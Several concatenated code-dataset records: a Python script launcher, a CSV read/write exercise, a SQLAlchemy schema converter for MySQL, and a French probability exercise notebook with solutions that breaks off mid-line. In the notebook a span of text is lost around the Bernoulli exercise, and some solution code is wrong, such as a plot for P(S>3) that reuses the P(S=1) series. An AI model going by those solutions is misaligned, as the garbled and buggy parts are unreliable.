\n logger.debug(\"Creating Python Script Launcher...\")\n \n \n Process.__init__(self)\n Launcher.__init__(self, initParams)\n \n self.globalVariables= {}\n self.localVariables= {}\n \n self.queueResult = Queue()\n self.queueOutput = Queue()\n \n self.localVariables = {}\n self.globalVariables = {}\n self.result = None\n self.output = None\n \n self.timeout = None\n self.command = None\n \n @contextlib.contextmanager\n def _stdoutIO(self,stdout=None):\n '''\n Redirects standard output\n '''\n old = sys.stdout\n if stdout is None:\n stdout = StringIO.StringIO()\n sys.stdout = stdout\n yield stdout\n sys.stdout = old\n \n def sendCommand(self,command,timeout,inputParams=None):\n '''\n Sends a command to the launcher keeping previous state\n '''\n self.timeout = timeout\n self.command = command\n self.inputParams = inputParams\n self._launch()\n \n def resetAndSendCommand(self,command,timeout,inputParams=None):\n '''\n Sends a command to the launcher but before resets all the previous state\n '''\n self.timeout = timeout\n self.command = command\n self.inputParams = inputParams\n self._launch()\n \n # private\n def _launch(self):\n \"\"\"\n Blocks the execution!!!!\n \"\"\"\n if self.inputParams is not None :\n logger.debug(\"Old file: \" + self.command)\n self.command = self.substituteParamsInFile(self.command,self.inputParams,suffix=\".py\",prefix=\"live_\")\n logger.debug(\"New file: \" + self.command)\n \n self.start()\n self.join(self.timeout)\n\n if self.is_alive():\n logger.info(\"Thread timed out but the process is still running. Killing: %s\" % self.command )\n self.terminate()\n self.join()\n else :\n logger.info(\"Thread finished successfully: %s\"%self.command)\n \n if self.inputParams is not None and self.command.startswith('/tmp'):\n os.remove(self.command)\n self.inputParams = None\n \n # Restart thread to avoid : raise RuntimeError(\"threads can only be started once\")\n #super(PythonScriptLauncher, self).__init__()\n \n \n def run(self):\n '''\n No memory sharing!\n '''\n logger.debug(\"Running in background: %s\" % self.command) \n \n with self._stdoutIO() as s:\n execfile(self.command, self.globalVariables, self.localVariables)\n self.queueOutput.put(s.getvalue())\n \n result = {}\n if self.localVariables.has_key('result') :\n result = self.localVariables['result']\n self.queueResult.put(result)\n \n def readOutput(self):\n return self.queueOutput.get(block=False)\n \n def setInputParameters(self,inputParams):\n '''\n Sets input parameters\n variable params\n '''\n self.localVariables['params'] = inputParams\n \n \n def getResult(self):\n '''\n Get result in form of json\n variable result\n '''\n return self.queueResult.get(block=False)\n \n \n \n ### Non private methods:\n \n \n\n\n ","repo_name":"ricleal/reductionServer","sub_path":"src/query/asynccall/pythonlauncher.py","file_name":"pythonlauncher.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71056358632","text":"import csv\n\n# getting data from CSV\n\nexample_csv_file = open('fruits.csv')\n\nexample_csv_reader = csv.reader(example_csv_file)\nexample_python_data = list(example_csv_reader)\n\nexample_csv_file.close()\n\n\n# writing data to CSV\n\noutput_csv_file = open('fruits2.csv', 'w')\n\noutput_csv_writer = csv.writer(output_csv_file, delimiter='\\t', lineterminator='\\n\\n')\n\nfor row in example_python_data:\n output_csv_writer.writerow(row)\n\noutput_csv_file.close()\n","repo_name":"maciej3031/python_exercises","sub_path":"47_CSV_basic_operations.py","file_name":"47_CSV_basic_operations.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25669851545","text":"#!/usr/bin/python\n# encoding: utf-8\n\"\"\"\nsqlalchemy.py\nFunctions to make SQLAlchemy easier to set up with a MySQL database.\n\nThis module contains very rudimentary conversion functions from MySQL schemas to SQL Alchemy Python classes.\nIt has only been tested on a simple database. It only handles a handful of MySQL types at present and does not create\nunique, foreign, or primary keys in the Python classes. Please feel free to help complete this module but as I will\nonly be adding to it on a need-only basis.\n\nCreated by Shane O'Connor 2014\n\"\"\"\n\nimport sys\nimport string\nimport re\nimport traceback\nimport copy\n\nfrom sqlalchemy import Table, Column, Integer, ForeignKey\nfrom sqlalchemy.orm import relationship, backref\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy import create_engine, and_\nfrom sqlalchemy import inspect as sqlalchemy_inspect\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm.collections import InstrumentedList\n\nif __name__ == '__main__':\n sys.path.insert(0, '..')\nfrom klab import colortext\nfrom .mysql import DatabaseInterface\n\n\n\n# @todo. This module saves time creating SQLAlchemy class definitions. It is still very basic however (and hacked together).\n# The next improvement should be to handle foreign key constraint definitions e.g. turn\n# CONSTRAINT `PDBResidue_ibfk_1` FOREIGN KEY (`PDBFileID`, `Chain`) REFERENCES `PDBChain` (`PDBFileID`, `Chain`)\n# into\n# PDBFileID = Column(..., ForeignKey('PDBChain.PDBFileID'))\n# Depending on the schema, a field may be involved in multiple foreign key constraints.\n# It may make more sense to use relationships here instead e.g.\n# pdb_chain = relationship(\"PDBChain\", foreign_keys=[PDBFileID, Chain])\n# but I need to read the documentation.\n\n\ndef row_to_dict(r, keep_relationships = False):\n '''Converts an SQLAlchemy record to a Python dict. We assume that _sa_instance_state exists and is the only value we do not care about.\n If DeclarativeBase is passed then all DeclarativeBase objects (e.g. those created by relationships) are also removed.\n '''\n d = {}\n if not keep_relationships:\n # only returns the table columns\n t = r.__table__\n for c in [c.name for c in list(sqlalchemy_inspect(t).columns)]:\n d[c] = getattr(r, c)\n return d\n else:\n # keeps all objects including those of type DeclarativeBase or InstrumentedList and the _sa_instance_state object\n return copy.deepcopy(r.__dict__)\n\n\ndef get_single_record_from_query(result_set):\n '''A helper function to return the single result from a query. This is a variation of SQLAlchemy's .one()\n function. We assume that either a result does not exist or exactly one exists (one() assumes that exactly one exists).\n Returns None in the former case and the result in the latter case.\n '''\n assert(result_set.count() <= 1)\n if result_set.count() == 1:\n return result_set[0]\n\n\ndef get_or_create_in_transaction(tsession, model, values, missing_columns = [], variable_columns = [], updatable_columns = [], only_use_supplied_columns = False, read_only = False):\n '''\n Uses the SQLAlchemy model to retrieve an existing record based on the supplied field values or, if there is no\n existing record, to create a new database record.\n\n :param tsession: An SQLAlchemy transactioned session\n :param model: The name of the SQLAlchemy class representing the table\n :param values: A dict of values which will be used to populate the fields of the model\n :param missing_columns: Elements of missing_columns are expected to be fields in the model but are left blank regardless of whether they exist in values. This is useful for auto_increment fields.\n :param updatable_columns: If these are specified, they are treated as missing columns in the record matching and if a record is found, these fields will be updated\n :param variable_columns: If these are specified, they are treated as missing columns in the record matching but are not updated. A good use of these are for datetime fields which default to the current datetime\n :param read_only: If this is set then we query the database and return an instance if one exists but we do not create a new record.\n :return:\n\n Note: This function is a convenience function and is NOT efficient. The \"tsession.query(model).filter_by(**pruned_values)\"\n call is only (sometimes) efficient if an index exists on the keys of pruned_values. If any of the fields of pruned_values are\n large (even if otherwise deferred/loaded lazily) then you will incur a performance hit on lookup. You may need\n to reconsider any calls to this function in inner loops of your code.'''\n\n\n values = copy.deepcopy(values) # todo: this does not seem to be necessary since we do not seem to be writing\n\n fieldnames = [c.name for c in list(sqlalchemy_inspect(model).columns)]\n for c in missing_columns:\n fieldnames.remove(c)\n for c in updatable_columns:\n fieldnames.remove(c)\n for c in variable_columns:\n if c in fieldnames:\n fieldnames.remove(c)\n\n if only_use_supplied_columns:\n fieldnames = sorted(set(fieldnames).intersection(set(values.keys())))\n else:\n unexpected_fields = set(values.keys()).difference(set(fieldnames)).difference(set(variable_columns)).difference(set(updatable_columns))\n if unexpected_fields:\n raise Exception(\"The fields '{0}' were passed but not found in the schema for table {1}.\".format(\"', '\".join(sorted(unexpected_fields)), model.__dict__['__tablename__']))\n\n pruned_values = {}\n for k in set(values.keys()).intersection(set(fieldnames)):\n v = values[k]\n pruned_values[k] = v\n\n instance = tsession.query(model).filter_by(**pruned_values)\n if instance.count() > 1:\n raise Exception('Multiple records were found with the search criteria.')\n instance = instance.first()\n\n if instance:\n if read_only == False:\n for c in updatable_columns:\n setattr(instance, c, values[c])\n tsession.flush()\n return instance\n else:\n if read_only == False:\n if sorted(pruned_values.keys()) != sorted(fieldnames):\n # When adding new records, we require that all necessary fields are present\n raise Exception('Some required fields are missing: {0}. Either supply these fields or add them to the missing_columns list.'.format(set(fieldnames).difference(list(pruned_values.keys()))))\n instance = model(**pruned_values)\n tsession.add(instance)\n tsession.flush()\n return instance\n return None\n\n\ndef get_or_create_in_transaction_wrapper(tsession, model, values, missing_columns = [], variable_columns = [], updatable_columns = [], only_use_supplied_columns = False, read_only = False):\n '''This function can be used to determine which calling method is spending time in get_or_create_in_transaction when profiling the database API.\n Switch out calls to get_or_create_in_transaction to get_or_create_in_transaction_wrapper in the suspected functions to determine where the pain lies.'''\n return get_or_create_in_transaction(tsession, model, values, missing_columns = missing_columns, variable_columns = variable_columns, updatable_columns = updatable_columns, only_use_supplied_columns = only_use_supplied_columns, read_only = read_only)\n\n\nclass IntermediateField(object):\n\n\n def __init__(self, field_name, field_type, not_null = False, default_type = None, default_value = None, comment = None, is_primary_key = False, unicode_collation_or_character_set = False):\n self.field_name = field_name\n self.field_type = field_type\n self.not_null = not_null\n self.default_type = default_type\n self.default_value = default_value\n self.comment = comment\n self.is_primary_key = is_primary_key\n self.unicode_collation_or_character_set = unicode_collation_or_character_set\n\n\n def to_sql_alchemy(self, typedefs):\n s = ''\n s += self.field_name + ' = Column('\n\n is_string_type = None\n is_numeric_type = None\n\n if self.field_type.startswith('varchar'):\n mtchs = re.match(\"varchar[(](\\d+)[)]\", self.field_type)\n assert(mtchs)\n length = int(mtchs.group(1))\n is_string_type = True\n if self.unicode_collation_or_character_set:\n s += 'Unicode(%d)' % length\n typedefs['sqlalchemy.types'].add('Unicode')\n else:\n typedefs['sqlalchemy.types'].add('String')\n s += 'String(%d)' % length\n\n elif self.field_type == 'double':\n s += 'DOUBLE'\n is_numeric_type = True\n typedefs['sqlalchemy.dialects.mysql'].add('DOUBLE')\n\n elif self.field_type == 'float':\n s += 'Float'\n is_numeric_type = True\n typedefs['sqlalchemy.types'].add('Float')\n\n elif self.field_type == 'longtext' or self.field_type == 'text' or self.field_type == 'mediumtext':\n s += 'Text'\n is_numeric_type = True\n typedefs['sqlalchemy.types'].add('Text')\n\n elif self.field_type == 'date' or self.field_type == 'datetime':\n s += 'DateTime'\n is_numeric_type = True\n typedefs['sqlalchemy.types'].add('DateTime')\n\n elif self.field_type == 'timestamp':\n s += 'TIMESTAMP'\n is_numeric_type = True\n typedefs['sqlalchemy.types'].add('TIMESTAMP')\n\n elif self.field_type.startswith('enum('):\n s += self.field_type.replace('enum', 'Enum')\n is_string_type = True\n typedefs['sqlalchemy.types'].add('Enum')\n\n elif self.field_type.startswith('int(') or self.field_type.startswith('bigint('):\n s += 'Integer'\n is_numeric_type = True\n typedefs['sqlalchemy.types'].add('Integer')\n\n elif self.field_type.startswith('tinyint('):\n s += self.field_type.upper()\n is_numeric_type = True\n typedefs['sqlalchemy.dialects.mysql'].add('TINYINT')\n\n elif self.field_type == 'blob':\n s += 'BLOB'\n is_numeric_type = True\n typedefs['sqlalchemy.dialects.mysql'].add('BLOB')\n\n elif self.field_type == 'longblob':\n s += 'LONGBLOB'\n is_numeric_type = True\n typedefs['sqlalchemy.dialects.mysql'].add('LONGBLOB')\n\n else:\n raise Exception(\"Unhandled type: '%s'\" % self.field_type)\n\n if self.not_null:\n s += ', nullable=False'\n else:\n s += ', nullable=True'\n\n if self.is_primary_key:\n s += ', primary_key=True'\n\n if self.default_type != None:\n if self.default_type == 'string':\n if is_string_type:\n s += \", default=u'%s'\" % self.default_value\n elif is_numeric_type:\n s += \", default=%s\" % self.default_value\n else:\n assert(0)\n\n s += ')'\n return s\n\n\nclass MySQLSchemaConverter(object):\n\n def __init__(self, user, host, db, passwd, port = 3306, socket = '/var/lib/mysql/mysql.sock'):\n try:\n self.db_interface = DatabaseInterface({}, isInnoDB=True, numTries=1, host=host, db=db, user=user, passwd=passwd, port=3306,\n unix_socket=socket, passwdfile=None, use_utf=False, use_locking=True)\n except Exception as e:\n colortext.error('An exception was thrown trying to connect to the database.')\n colortext.warning(str(e))\n print((traceback.format_exc()))\n sys.exit(1)\n\n self.intermediate_schema = {}\n self.tables = self.db_interface.TableNames\n self._parse_schema()\n\n\n def _parse_schema(self):\n for tbl in self.tables:\n self._create_intermediate_schema(tbl)\n\n\n def get_sqlalchemy_schema(self, restrict_to_tables = []):\n colortext.warning(' *** MySQL schema ***')\n schema = []\n #print(self.intermediate_schema)\n\n typedefs = {'sqlalchemy.types' : set(), 'sqlalchemy.dialects.mysql' : set()}\n\n for tbl in self.tables:\n if (not restrict_to_tables) or (tbl in restrict_to_tables):\n colortext.message(tbl)\n\n print((self.db_interface.execute(\"SHOW CREATE TABLE %s\" % tbl))[0]['Create Table'])\n print('')\n code = []\n code.append(\"class %s(DeclarativeBase):\" % tbl)\n code.append(\" __tablename__ = '%s'\\n\" % tbl)\n #print('\\n'.join(code))\n\n intermediate_table = self.intermediate_schema[tbl]\n for field in intermediate_table:\n s = field.to_sql_alchemy(typedefs)\n code.append(' {0}'.format(s))\n #print(s)\n code.append('\\n')\n #print('')\n schema.extend(code)\n\n imports = []\n for module, types in sorted(typedefs.items()):\n imports.append('from %s import %s' % (module, ', '.join(sorted(types))))\n schema = imports + [''] + schema\n\n colortext.warning('*** SQLAlchemy class definitions ***')\n print(('\\n'.join(schema)))\n\n\n def _create_intermediate_schema(self, tbl):\n code = (self.db_interface.execute(\"SHOW CREATE TABLE %s\" % tbl))\n assert(len(code) == 1)\n schema = code[0]['Create Table']\n #colortext.message(tbl)\n\n #print(schema)\n\n #print(schema)\n fields = [f for f in map(string.strip, schema[schema.find('(') + 1:schema.find('PRIMARY KEY')].strip().split('\\n')) if f.strip()]\n\n pk_fields = re.match('.*PRIMARY\\s+KEY\\s*[(](.*?)[)]\\s*[,)].*', schema, re.DOTALL)\n assert(pk_fields)\n pk_fields = [s.strip() for s in pk_fields.group(1).replace('`', '').split(',') if s.strip()]\n\n\n #colortext.warning(fields)\n for f in fields:\n #print('')\n #colortext.message(f)\n if f.endswith(','):\n f = f[:-1]\n\n field_name = f.split()[0].replace('`', '')\n if f.split()[1].startswith('enum('):\n mtchs = re.match(\".* (enum[(].*?[)])(.*)\", f)\n assert(mtchs)\n #print('ENUM', mtchs.group(1))\n field_type = mtchs.group(1)\n remaining_description = mtchs.group(2)\n else:\n field_type = f.split()[1]\n remaining_description = (' '.join(f.split()[2:])).strip()\n\n unicode_collation_or_character_set = False\n if remaining_description.find('utf') != -1:\n unicode_collation_or_character_set = True\n\n not_null = False\n if remaining_description.find('NOT NULL') != -1:\n not_null = True\n remaining_description = remaining_description.replace('NOT NULL', '').strip()\n\n default = False\n default_type = None\n default_value = None\n if remaining_description.find('default CURRENT_TIMESTAMP') != -1:\n default_type = 'TIMESTAMP'\n default_value = None\n remaining_description = remaining_description.replace('default CURRENT_TIMESTAMP', '')\n elif remaining_description.find('default NULL') != -1:\n default_type = 'null'\n default_value = None\n remaining_description = remaining_description.replace('default NULL', '')\n elif remaining_description.find('default') != -1:\n mtchs = re.match(\".*default '(.*?)'.*\", remaining_description)\n if mtchs:\n #print('mtchs', mtchs.group(1))\n default_type = 'string'\n default_value = mtchs.group(1)\n remaining_description = remaining_description.replace(\"default '%s'\" % default_value, \"\")\n else:\n colortext.error('Unexpected default value string: \"{0}\".'.format(remaining_description))\n pass\n #mtchs = re.match(\".*default (.*?)(\\s.*)*$\", remaining_description)\n #if mtchs:\n # print('mtchs non-string', mtchs.group(1))\n # if mtchs.group(1) == 'NULL':\n # default_type = 'null'\n # default_value = None\n # remaining_description = remaining_description.replace('')\n\n comment = None\n mtchs = re.match(\".*(COMMENT '.*?').*\", remaining_description)\n if mtchs:\n comment = mtchs.group(1)\n remaining_description = remaining_description.replace(mtchs.group(1), \"\")\n\n remaining_description = remaining_description.strip()\n\n self.intermediate_schema[tbl] = self.intermediate_schema.get(tbl, [])\n self.intermediate_schema[tbl].append(IntermediateField(field_name, field_type, not_null = not_null, default_type = default_type, default_value = default_value, comment = comment, is_primary_key = field_name in pk_fields, unicode_collation_or_character_set = unicode_collation_or_character_set))\n\n #print('field_name : %s' % field_name)\n #print('field_type : %s' % field_type)\n #print('not_null : %s' % not_null)\n\n if default_type != None:\n pass\n #print('default: %s, %s' % (default_type, default_value))\n #print('comment : %s' % comment)\n if remaining_description:\n #colortext.error('remaining_description : %s' % remaining_description)\n pass\n #print('\\n')\n\n\nif __name__ == '__main__':\n script_name = sys.argv[0]\n args = sys.argv[1:]\n if 4 > len(args) or len(args) > 6:\n print(('Usage : %s [user] [host] [db] [passwd]' % script_name))\n print(('Optional arguments: %s [user] [host] [db] [passwd] [port] [socket]' % script_name))\n else:\n user = args[0]\n host = args[1]\n db = args[2]\n passwd = args[3]\n port = 3306\n socket = '/var/lib/mysql/mysql.sock'\n if len(args) == 6:\n socket = args[5]\n if len(args) >= 5:\n try:\n port = int(args[4])\n except:\n colortext.error('Error: Port must be a numeric string.')\n sys.exit(1)\n sc = MySQLSchemaConverter(user, host, db, passwd, port, socket)\n sc.get_sqlalchemy_schema()\n","repo_name":"Kortemme-Lab/klab","sub_path":"klab/db/sqlalchemy_interface.py","file_name":"sqlalchemy_interface.py","file_ext":"py","file_size_in_byte":18870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"14145582014","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Série2 : Correction \n# ## Exercice 1: \n# \n# Nous avons à notre disposition les données d'échec ou de réussite de l'examen de cette matière de 2020. Nous allons nous intérésser en particulier à deux variables binaires de ces données:\n# - La section: **S** $\\in\\{\\text{GM},\\text{EL}\\}$\n# - Le succes à l'examen: **A** $\\in\\{0,1\\}$\n# \n# Dans le cadre des probabilités conditionnelles, avec deux variables binaires, une erreur qui revient souvent est de penser que:\n# \\begin{equation*} \\mathbb{P}\\left(\\textbf{A} = 1 | \\textbf{S} = \\text{GM}\\right) + \\mathbb{P}\\left(\\textbf{A} = 1 | \\textbf{S} = \\text{EL}\\right) = 1 \\end{equation*}\n# Néanmoins, cela est généralement faux. Nous allons donc nous appliquer à montrer que cela est faux dans notre cas, ainsi que de voir quel serait la version correcte de cette équation.\n\n# In[ ]:\n\n\nimport pandas as pd\ndata = pd.read_csv(\"Success_ProbaStat.csv\")\n\n\n# 1\\) Synthétiser ces données de façon à avoir le nombre d'échec ou de réussite par section.\n\n# In[ ]:\n\n\n########### Solution Python: ##########\n\nn = len(data)\nProp = data.value_counts(subset = [\"Section\",\"Succes\"])/n\nProp\n\n\n# 2\\) Montrer expérimentalement que $ \\mathbb{P}\\left(\\textbf{A} = 1 | \\textbf{S} = \\text{GM}\\right) + \\mathbb{P}\\left(\\textbf{A} = 1 | \\textbf{S} = \\text{EL}\\right) \\neq 1 $:\n\n# In[ ]:\n\n\n########### Solution Python: ##########\n\n\n# Probabilité empirique d'être en GM ou en EL\nprop_section = data.value_counts(subset = [\"Section\"])/n\n# Calcul de cette somme de probabilité\nprob_sum = Prop[0]/prop_section[0] + Prop[1]/prop_section[1]\nprob_sum\n\n\n# 3\\) Cette erreur est plutôt commune et vient d'une confusion avec une autre équation qui elle est correcte:\n# \\begin{equation*}\\mathbb{P}\\left(\\textbf{A} = 1 | \\textbf{S} = \\text{s}\\right) + \\mathbb{P}\\left(\\textbf{A} = 0 | \\textbf{S} = \\text{s}\\right) = 1, \\forall s\\in\\{\\text{GM},\\text{EL}\\}\n# \\end{equation*}\n# Vérifier expérimentalement que cette équation est correcte. \n# **Solution**: \n# Ce résultat est vrai de manière générale, il découle directement de la définition de la probabilité conditionnel. Sauriez-vous montrer rigoureusement pourquoi cela est vrai ?\n# \n\n# In[ ]:\n\n\n########### Solution Python: ##########\n\n\nEL = Prop[1]/prop_section[1] + Prop[3]/prop_section[1]\nGM = Prop[0]/prop_section[0] + Prop[2]/prop_section[0]\n\nprint(f\"EL = {EL}, GM = {GM}\")\n\n\n# ## Exercice 2: \n# \n# Nous allons considérer quatre fonctions définies de l'ensemble $\\left\\{0, 1, 2, ..., 10\\right\\}$ dans $\\mathbb{R}$. Le but de cet exercice est de vérifier lesquels de ces fonctions sont des fonctions de masses.\n\n# In[ ]:\n\n\nimport fonction\n\nX = [0,1,2,3,4,5,6,7,8,9,10]\n\n# Vous pouvez accéder à ces quatres fonctions, f1,f2,f3,f4, de la manière suivante\nfonction.f2(2)\n\n\n# 1\\) La fonction ```f1``` est-elle une fonction de masse ?\n# \n# **Solution**: Oui, la fonction de ```f1``` est une fonction de masse.\n# \n\n# In[ ]:\n\n\n########### Solution Python: ##########\n\n# Vérifier si f1 est une fonction de masse\nmasse = True\nsum_ = 0\nfor x in X:\n sum_ += fonction.f1(x)\n if fonction.f1(x)<0:\n masse = False\n print(f\"f1({x}) = {fonction.f1(x)} < 0\")\n\nif abs(sum_-1)>1e-06:\n masse = False\n\nif masse:\n print(\"La fonction f1 est donc une fonction de masse\")\nelse: \n print(\"La fonction f1 n'est donc pas une fonction de masse\")\n\n\n# 2\\) La fonction ```f2``` est-elle une fonction de masse ?\n# \n# **Solution**: Non, la fonction de ```f2``` n'est pas une fonction de masse car elle ne respecte pas la condition $\\sum_i f_2(x_i) = 1$\n# \n\n# In[ ]:\n\n\n########### Solution Python: ##########\n\n# Vérifier si f2 est une fonction de masse\nmasse = True\nsum_ = 0\nfor x in X:\n sum_ += fonction.f2(x)\n if fonction.f2(x)<0:\n masse = False\n print(f\"f2({x}) = {fonction.f2(x)} < 0\")\n\nif abs(sum_-1)>1e-06:\n masse = False\n\nif masse:\n print(\"La fonction f2 est donc une fonction de masse\")\nelse: \n print(\"La fonction f2 n'est donc pas une fonction de masse\")\n\n\n# 3\\) La fonction ```f3``` est-elle une fonction de masse ?\n# \n# **Solution**: Oui, la fonction de ```f3``` est une fonction de masse.\n# \n\n# In[ ]:\n\n\n########### Solution Python: ##########\n\n# Vérifier si f3 est une fonction de masse\nmasse = True\nsum_ = 0\nfor x in X:\n sum_ += fonction.f3(x)\n if fonction.f3(x)<0:\n masse = False\n print(f\"f3({x}) = {fonction.f3(x)} < 0\")\n\nif abs(sum_-1)>1e-06:\n masse = False\n\nif masse:\n print(\"La fonction f3 est donc une fonction de masse\")\nelse: \n print(\"La fonction f3 n'est donc pas une fonction de masse\")\n\n\n# 4\\) La fonction ```f4``` est-elle une fonction de masse ?\n# \n# **Solution**: Non, la fonction de ```f4``` n'est pas une fonction de masse car elle ne respecte pas la condition $\\sum_i f_4(x_i) = 1$ et on a que $f4(9) < 0$ ce qui n'est pas possible, par définition, pour une fonction de masse.\n# \n\n# In[ ]:\n\n\n########### Solution Python: ##########\n\n# Vérifier si f4 est une fonction de masse\nmasse = True\nsum_ = 0\nfor x in X:\n sum_ += fonction.f4(x)\n if fonction.f4(x)<0:\n masse = False\n print(f\"f4({x}) = {fonction.f4(x)} < 0\")\n\nif abs(sum_-1)>1e-06:\n masse = False\n\nif masse:\n print(\"La fonction f4 est donc une fonction de masse\")\nelse: \n print(\"La fonction f4 n'est donc pas une fonction de masse\")\n\n\n# ## Exercice 3: \n# \n# Le but de cet exercice est de déterminer si les fonctions suivantes peuvent être des fonctions de répartitions.\n\n# In[ ]:\n\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfig, (ax1, ax2, ax3) = plt.subplots(1, 3,figsize = (10,4))\nax1.plot(np.array([-10.,0.,0.,10.,10.,20.,20.,30.,30.,40.,40.,50.,50.,60.,60.,70.,70.,80.,80.,90.,90.,100.,100.,120.,120.]),\n np.array([0.,0.,0.1,0.1,0.19,0.19,0.25,0.25,0.34,0.34,0.45,0.45,0.5,0.5,0.57,0.57,0.61,0.61,0.63,0.63,0.65,0.65,0.67,0.67,0.67]))\nax1.set_title(\"Figure 1\")\n\nax2.plot(np.array([-10.,0.,0.,10.,10.,20.,20.,30.,30.,35.,35.,50.,50.,54.,54.,70.,70.,83.,83.,90.,90.,115.,115.,120.,120.]),\n np.array([0.,0.,0.05,0.05,0.09,0.09,0.15,0.15,0.34,0.34,0.39,0.39,0.47,0.47,0.67,0.67,0.86,0.86,0.89,0.89,0.91,0.91,1.,1.,1.]))\nax2.set_title(\"Figure 2\")\n\nax3.plot(np.array([-10.,0.,0.,10.,10.,20.,20.,30.,30.,35.,35.,50.,50.,54.,54.,70.,70.,83.,83.,90.,90.,115.,115.,120.,120.]),\n np.array([0.,0.,0.05,0.05,0.09,0.09,0.15,0.15,0.34,0.34,0.39,0.39,0.47,0.47,0.67,0.67,0.86,0.86,0.84,0.84,0.91,0.91,1.,1.,1.]))\nax3.set_title(\"Figure 3\")\n\nplt.show()\n\n\n# 1\\) La Figue 1 est-elle le plot d'une fonction de répartition ?\n# \n# **Solution**: Non, car $ F(x) = \\Pr (X \\leq x) $ implique que $ \\lim_{x\\to\\infty} F(x) = 1 $. \n# \n# 2\\) La Figue 2 est-elle le plot d'une fonction de répartition ?\n# \n# **Solution**: Oui. \n# \n# 3\\) La Figue 3 est-elle le plot d'une fonction de répartition ?\n# \n# **Solution**: Non, car la fonction doit être non décroissante.\n# \n\n# ## Exercice 4: Lien entre une variable de Bernoulli et une variable géométrique\n# \n# Considérons un archer, qui vise le milieu de la cible. Il tire autant de flèche que nécessaire et s'arrête une fois qu'une d'entre elle frappe le centre de la cible. On suppose qu'il parvient à atteindre son but avec une probabilité $p$ à chaque flèche et que chaque tir est indépendant des autres.\n# - Le fait que le $i^{ème}$ tir atteigne le centre de la cible peut alors être modéliser par la variable aléatoire $X_i \\sim Bern(p)$. \n# - De même, le nombre de flèches nécéssaires avant d'atteindre le centre de la cible peut être modéliser par la variable aléatoire $ S = \\min\\left\\{{i\\in\\mathbb{N} | X_i = 1}\\right\\}$, qui suit une loi géométrique de paramètre $p$.\n\n# 1\\) Dans question nous allons créer une fonction ```bern``` qui génère aléatoirement une variable de Bernouilli pour un paramètre $p$ donné en argument. \n# a\\) En utilisant la fonction \n# \n# ```random.uniform```, du package ```numpy```, qui permet de générer des réalisations de variables aléatoires uniformes, et la fonction indicatrice $\\mathbf{1}_{\\{U1-\\frac{2p}{3}\\}\\}}\\end{equation*} \n# \n# On pourrait encore en envisager une infinité, le point important est la mesure (la taille) de l'intervalle sur lequel la fonction indicatrice vaut $1$ soit égal à $p$.\n# \n\n# 2\\) En utilisant la fonction ```bern```, écrire une fonction ```geom``` qui simule la génération d'une variable aléatoire $S = \\min\\left\\{{i\\in\\mathbb{N} | X_i = 1}\\right\\}$, où $X_i \\sim Bern(p)$.\n\n# In[ ]:\n\n\ndef geom(p):\n \n if abs(p)<1e-10:\n raise(\"La probabilité de succès doit être supérieure à zéro.\")\n \n S = 1\n X = bern(p,1)\n \n while X != 1:\n S +=1\n X = bern(p,1)\n \n return S\n\n\n# 3\\) Nous allons maintenant estimer quelques probabilités liées à notre variable aléatoire $S$: \n# a\\) Grâce à un plot et une valeure numérique, estimer la valeure de $\\mathbb{P}(S = 1)$ ($n = 10000$ devrait être suffisant pour une bonne estmination). \n# \n# **Solution**: \n# Observe que la probabilité que notre estimation semble converger vers $p = 0.3$, qui est justement la vrai valeur de $\\mathbb{P}(S = 1)$ (pour $p = 0.3$).\n# \n\n# In[ ]:\n\n\nn = 10000\np = 0.3\n\n# Générer n observations de S\nS = [geom(p) for i in range(n)]\n\n# Proposer une estimation de P(S = 1)\nprob1 = (S == np.ones(n)).sum()/n\nprint(f\"On estime donc cette probabilité par : {prob1}\")\n\n# Faire un plot montrant la convergence de cette probabilité\nfig = plt.figure(figsize = (6,4))\nplt.plot(np.arange(1,n+1),(S == np.ones(n)).cumsum()/np.arange(1,n+1))\nfig.suptitle(\"Convergence de l'estimation de P(S=1)\")\nfig.supylabel(\"Estimation de la probabilité\")\nfig.supxlabel(\"Nombre de variable générée\")\nplt.show()\n\n\n# b\\) De la même manière que la question précédente, estimer la probabilité $\\mathbb{P}(S>3)$.\n# \n# **Solution**: \n# Observe que la probabilité que notre estimation semble converger vers une valeure proche de $0.34$, qui est justement proche de la vrai valeur de $\\mathbb{P}(S > 3) = (1-p)^3 = 0.343$ (pour $p = 0.3$). \n# \n\n# In[ ]:\n\n\nn = 10000\np = 0.3\n\n# Générer n observations de S\nS = [geom(p) for i in range(n)]\n\n# Proposer une estimation de P(S > 3)\nprob2 = (S > 3.*np.ones(n)).sum()/n\nprint(f\"On estime donc cette probabilité par : {prob2}\")\n\n# Faire un plot montrant la convergence de cette probabilité\nfig = plt.figure(figsize = (6,4))\nplt.plot(np.arange(1,n+1),(S == np.ones(n)).cumsum()/np.arange(1,n+1))\nfig.suptitle(\"Convergence de l'estimation de P(S=1)\")\nfig.supylabel(\"Estimation de la probabilité\")\nfig.supxlabel(\"Nombre de variable générée\")\nplt.show()\n\n\n# c\\) Enfin, pour des valeures $m$ et $t$ fixées, vérifier que $\\mathbb{P}(S > t + m| S > t) = \\mathbb{P}(S > m)$.\n# \n# **Solution**: \n# On observe donc ces deux valeurs convergent bien l'une vers l'autre, et que chacune convergent vers la valeurs $\\mathbb{P}(S > t + m| S > t) = \\mathbb{P}(S > m) = (1-p)^m = 0.489$ (pour $p = 0.3$).\n# \n\n# In[ ]:\n\n\nn = 10000 \np = 0.3\n\nt = 4\nm = 2\n\n# Générer deux ensemble de n observations de S pour estimer chacunes de ces \n# deux probabilités avec deux ensembles distinct\nS1 = [geom(p) for i in range(n)]\nS2 = [geom(p) for i in range(n)]\n\n# Proposer une estimation de P(S > t + m | S > t)\nprob3_1 = (S1 > (t+m)*np.ones(n)).sum()/n\nprob3_2 = (S1 > t*np.ones(n)).sum()/n\nprob3 = prob3_1/prob3_2\nprint(f\"On estime donc la probabilité P(S > t + m | S > t) par : {prob3}\")\n\n# Proposer une estimation de P(S > m)\nprob3_ = (S2 > 